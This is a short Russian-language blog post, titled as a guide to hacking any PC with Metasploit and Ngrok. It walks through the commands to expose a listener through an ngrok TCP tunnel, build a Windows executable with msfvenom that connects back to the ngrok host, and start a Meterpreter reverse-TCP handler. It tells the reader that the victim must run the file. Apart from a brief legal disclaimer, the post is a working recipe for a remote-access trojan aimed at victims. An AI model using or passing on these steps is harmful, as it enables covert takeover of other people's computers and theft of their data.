November 14, 2023
Взлом любого ПК с помощью Metasploit + Ngrok
Дисклеймер: Автор не несет ответсвенности за действия совершенные
читателями этого поста. Создание, использование и распространение вредоносных компьютерных программ запрещено статьей - 273 УК РФ
Что нам понадобится?
Kali Linux:
Открываем Терминал
Скачиваем Ngrok по команде
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok
Заходим на ngrok.com/download и регаем аккаунт
Листаем вниз и находим строку с командой
ngrok config add-authtoken <token>
вместо <token>, там будет ваш токен, копируем команду с сайта и вставляем в терминал
Запускаем локальный сервер командой
ngrok tcp 9999
После открываем новое окно в консоли вводим
msfvenom -p LHOST=2.tcp.ngrok.io LPORT=12223 -f exe > название файла.exe
В строке LHOST и LPORT вводите то что вывел вам NGROK
После этого в папке где вы находились во время ввода команды, появится файл с вашим названием .exe, его должна запустить жертва
Открываем еще одно новое окно и пишем туда
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 9999
exploit